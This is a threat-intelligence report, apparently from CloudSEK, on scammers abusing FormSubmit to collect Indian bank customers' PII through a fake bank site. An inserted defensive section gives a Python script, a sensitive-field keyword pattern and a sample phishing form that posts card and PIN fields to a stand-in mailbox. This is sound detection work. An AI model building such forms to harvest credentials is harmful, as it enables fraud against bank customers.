Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers

CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
Updated on: February 27, 2023
Published on: December 14, 2022
Category: Adversary Intelligence
Industry: Banking and Finance
Motivation: Financial
Region: Asia & Pacific

Executive Summary

Threat
  • Scammers use a free, no-code form service provider to forward victims’ PII to a verified email address.
  • Using this, scammers can steal banking credentials and PII.

Impact
  • Stolen PII details can be used to fuel various social engineering campaigns.
  • Victims can be exploited financially.

Mitigation
  • Use XVigil to actively track events and take the necessary actions.
  • Educate customers about such fraudulent activities through various social media posts.

Analysis and Attribution

  • CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
  • FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
  • This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.

Information from the Fake Domain

  • The following information was gathered from the WHOIS records:
    • Creation Date: 08 November 2022
    • Updated Date: 08 November 2022
    • Domain Registrar: GoDaddy

Using FormSubmit to Create a Phishing Page

FormSubmit requires no integration beyond a form designed for the website, and it can be set up in 3 steps:
  1. Connect the form on the hosted website.
  2. Include attributes in all form elements (like <input>, <select> and <textarea>) to receive the submission data.
  3. Confirm the specified email address, which is required on the first submission of the form.
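
A page built this way leaves a marker defenders can check for: a form whose action points at FormSubmit. The following is an added example for triaging saved HTML of a suspect page, not code from CloudSEK or from the original post; the endpoint host `formsubmit.co`, the keyword list and the sample HTML are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: FormSubmit's public endpoint host (not stated in the post).
FORMSUBMIT_HOSTS = {"formsubmit.co", "www.formsubmit.co"}
# Assumption: illustrative substrings for banking/PII field names; tune per brand.
SENSITIVE = re.compile(r"card|cvv|pin|otp|pan|aadhaar|account|password|dob|mobile", re.I)

class FormAudit(HTMLParser):
    """Collect each <form> action and the names of the fields inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._open)
        elif tag in ("input", "select", "textarea") and self._open is not None:
            if a.get("name"):
                self._open["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit(html):
    """Return one finding per form that posts its data to FormSubmit."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"].strip())
        if (url.hostname or "").lower() not in FORMSUBMIT_HOSTS:
            continue
        findings.append({
            # Path segment identifies the mailbox; useful in an abuse report.
            "recipient_id": url.path.strip("/"),
            "sensitive_fields": [f for f in form["fields"] if SENSITIVE.search(f)],
            "all_fields": form["fields"],
        })
    return findings

# Constructed sample input, not taken from the campaign.
SAMPLE = """
<form action="https://formsubmit.co/recipient@example.invalid" method="POST">
  <input type="text" name="customer_name"><input type="text" name="card_number">
  <input type="password" name="atm_pin"><select name="branch"></select>
</form>
<form action="/search"><input name="q"></form>
"""
```

A finding with sensitive field names on a domain that is not the bank's own is a strong triage signal; the recipient identifier can be passed to the form provider when reporting abuse.
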
Figure: Screenshot of the website of FormSubmit

Similar Phishing Campaigns

  • Scammers are rapidly adopting newer technologies and abusing services/features provided by various SaaS platforms.
  • In 2022, CloudSEK observed a new trend of abusing domain forwarding services (mostly freemium) offered by web hosting providers to host phishing pages.
  • These campaigns are usually targeted at Indian banking customers.
  • Previously, the following services were abused by threat actors for their campaigns:
    • Reverse tunneling services offered by ngrok, TryCloudflare, LocalHostRun and more
    • Cloudflare Pages
    • Hostinger’s Preview Domain
    • A2 Hosting’s Services

Appendix

Figure: Screenshot of the phishing website used by scammers to steal customers’ PII details
